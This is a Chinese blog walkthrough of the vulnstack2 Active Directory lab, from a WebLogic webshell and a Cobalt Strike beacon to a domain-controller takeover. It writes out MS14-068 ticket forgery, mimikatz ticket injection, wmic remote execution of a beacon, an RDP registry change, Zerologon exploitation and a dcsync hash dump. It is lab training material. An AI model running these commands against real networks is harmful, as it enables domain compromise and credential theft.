apsry

去留无意,宠辱不惊

0%

红日靶场2-vulnstack2

发表于 更新于 分类于

红日靶场2 vulnstack2

https://www.bianchengquan.com/article/408769.html

环境配置

参考:https://www.codeprj.com/blog/d3ef831.html

靶场统一密码1qaz@WSX

WEB

de1ay/1qaz@WSX

image-20220319164635599

切换快照到1.3

再用WEB/de1ay 1qaz@WSX登陆

image-20220319174120983

然后再改密码就可以了

image-20220319170636021

image-20220319182326680

PC

image-20220319164727154

image-20220319170636021

image-20220319170657136

image-20220319170707936

DC

image-20220319164831606

image-20220319170556250

外网

扫端口

image-20220319195507712

weblogic

weblogic,看看可能有什么漏洞,最终扫到了

image-20220319195555409

传个webshell

image-20220319200418158

起个CS

image-20220319202341477

创建监听

image-20220319202715236

远程加载powershell,可以看到会被360拦截

image-20220319203848365

可以用冰蝎连msf再转发给CS

image-20220319204508350

image-20220319204529208

免杀留坑QAQ

内网

提权

权限只有web权限,得提权

image-20220319233427523

image-20220320093048134

image-20220320093101540

image-20220320093122085

信息收集

用load的信息收集插件,可以看看收集了什么

image-20220320093815438

一些版本信息

systeminfo

image-20220320093841917

用户信息

image-20220320094005988

IP信息

image-20220320094027136

arp -a

可以看到10同一网段的信息

image-20220320094106491

路由表

image-20220320094201008

netstat

image-20220320094223055

tasklist

image-20220320094239636

schtasks

image-20220320094308451

防火墙

image-20220320094430931

扫描

image-20220320100554016

扫描内网10网段

可以用fscan,或者其它一些插件扫,也可以用CS自带的portscan

image-20220320102632350

image-20220320110401028

我这里portscan出了点问题

image-20220320110507847

也可以自己把扫描完的target导进去

image-20220320110554154

这个时候就是横向的移动

查看域控主机名

image-20220320121628597

我们先对域控进行扫描

image-20220320143349077

关闭防火墙

image-20220320150128012

PTH,MS14-068伪造票据(环境感觉被我弄坏了,失败)

在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码,因此如果攻击者获取了一台计算机的NTLM Hash值,就可以通过哈希传递攻击的方式登陆到内网中的其他机器

我们新建一个监听器

image-20220320143507867

创建监听器

然后再传

image-20220320143643040

直接用抓到的传

image-20220320143740587

MS14-068

使用MS14-068伪造票据获得管理员权限。
MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意的PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。普通用户可以通过呈现具有改变了PAC的Kerberos TGT来获得票证,进而伪造票据获得管理员权限。

  1. 上传ms14-068到目标机器

    MS14-068MS14-068

  2. 获取域用户sid(在低权限的beacon中下运行)

    bash

    1
    shell whoami /user

    sidsid

  3. 注册表开启3389

    bash

    1
    shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal"  "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    3389端口3389端口

  4. 利用抓取的账号密码进行登录

    登录登录

  5. 根据前面抓取的域用户、密码、sid,在cmd中,输入命令,伪造票据(其实通过之前收集到的用户名,也可以用这个密码撞一撞)

    bash

    1
    2
    ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器ip地址 -p 域成员密码
    MS14-068.exe -u de1ay@de1ay.com -p 1qaz@WSX -s S-1-5-21-3767205380-3469466069-2137393323-1000 -d 10.10.10.10

    MS14-068MS14-068

  6. 上传mimikatz,运行mimikatz将生成的票据注入进机器内存中。

    bash

    1
    2
    3
    kerberos::purge         //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
    kerberos::list          //查看当前机器凭证
    kerberos::ptc 票据文件   //将票据注入到内存中

    bash

    1
    2
    3
    kerberos::purge
    kerberos::list
    kerberos::TGT_de1ay@de1ay.com.ccache

    mimikatzmimikatz

  7. ipc连接域控机器

    bash

    1
    2
    net use \\10.10.10.10
    dir \\10.10.10.10\c$

    ipc连接ipc连接

横向渗透

  1. 利用跳板机的监听,CS生成木马

    生成木马生成木马

  2. 将木马上传至跳板机,再利用ipc连接上传至域控机器

    上传成功上传成功

  3. wmic执行命令

    bash

    1
    wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "cmd.exe /c start c:\beacon.exe"

    wmicwmic

  4. 查看CS

    成功上线

zerologon

mimikatz lsadump::zerologon /target:dc.de1ay.com /account:dc$

检测漏洞

image-20220320170545844

mimikatz lsadump::zerologon /target:dc.de1ay.com /account:dc$ /exploit

会把域控的密码改了空

image-20220320170611205

抓hash

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC /user:administrator /authuser:dc$ /authdomain:de1ay /authpassword:"" /authntlm

image-20220320171910368

image-20220320171923723

恢复密码

1
2
lsadump::postzerologon /target:域控ip /account:域控主机名$
lsadump::postzerologon /target:de1ay.com /account:dc$

添加target然后添加即可

image-20220320172701550

PC同理